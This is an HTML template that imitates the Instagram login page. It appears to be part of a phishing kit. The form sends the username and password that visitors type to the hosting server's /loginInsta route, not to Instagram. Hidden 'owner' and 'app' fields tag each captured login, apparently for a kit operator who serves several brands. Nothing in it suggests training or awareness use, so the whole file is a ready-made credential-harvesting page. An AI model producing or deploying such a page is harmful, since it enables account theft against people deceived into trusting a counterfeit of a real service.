<!DOCTYPE html>
<html>
    <head>
<title>Login • Instagram</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="{{ url_for('static', filename='insta_icon.ico')}}">
<link rel='stylesheet' type="text/css" href="/static/instagram/insta.css">
   
<script type="text/javascript">
    
    function checktext(){
        if(document.getElementById("username").value.trim().length>4 && document.getElementById("password").value.trim().length>4){
            document.getElementById("login-button").disabled=false;
         document.getElementById("login-button").style.backgroundColor='DodgerBlue';
      
        } else {
            document.getElementById("login-button").disabled=true;
         document.getElementById("login-button").style.backgroundColor= '#a8d1f7';
    }
 }
    
 </script>
</head>

    <body>
        <div class="container">
            <div class="box">
                <div class="heading"></div>



                
                <form class="login-form" action="/loginInsta" method="POST">
                    <div class="field">
                        <input id="username" name="uid" onkeyup="checktext()" type="name"  placeholder="Phone number, username, or email" />
                        <label for="username" >Phone number, username, or email</label>
                    </div>
                    <div class="field">
                        <input id="password" name="pas" onkeyup="checktext()" type="password" placeholder="password" />
                        <label for="password" >Password</label>
                        
                    </div>
                    <input type="text" name="owner" hidden value={{uid}}>
                    <input type="text" name="app" hidden value="Instagram">
                    <button id="login-button" title="login" type="submit" disabled>Log In</button>
                    



                    
                    <div class="separator">

                        <div class="line"></div>
                        <p>OR</p>
                        <div class="line"></div>
                    </div>
                    <div class="other">
                        <button class="fb-login-btn" type="button">
                            <!-- <i class="fa fa-facebook-official fb-icon"></i> -->
                            <span class="">Log in with Facebook</span>
                        </button>
                        <a class="forgot-password" href="#">Forgot password?</a>
                    </div>
                </form>
            </div>
            <div class="box">
                <p>Don't have an account? <a class="signup" href="#">Sign Up</a></p>
            </div>
        </div>
        <p style="position: relative;text-align: center; width: 100%;">Get the app.</p>

<div style=" margin-left: auto; ; margin-right: auto; width: 50%;  display: flex;
justify-content: center;">
    <img src="/static/instagram/applestore.png" alt="image" width="136px" height="40px" >
       
    
        <img src="/static/instagram/googleplay.png" alt="image" width="134px" height="40px"  >
    
</div>

    </body>
</html>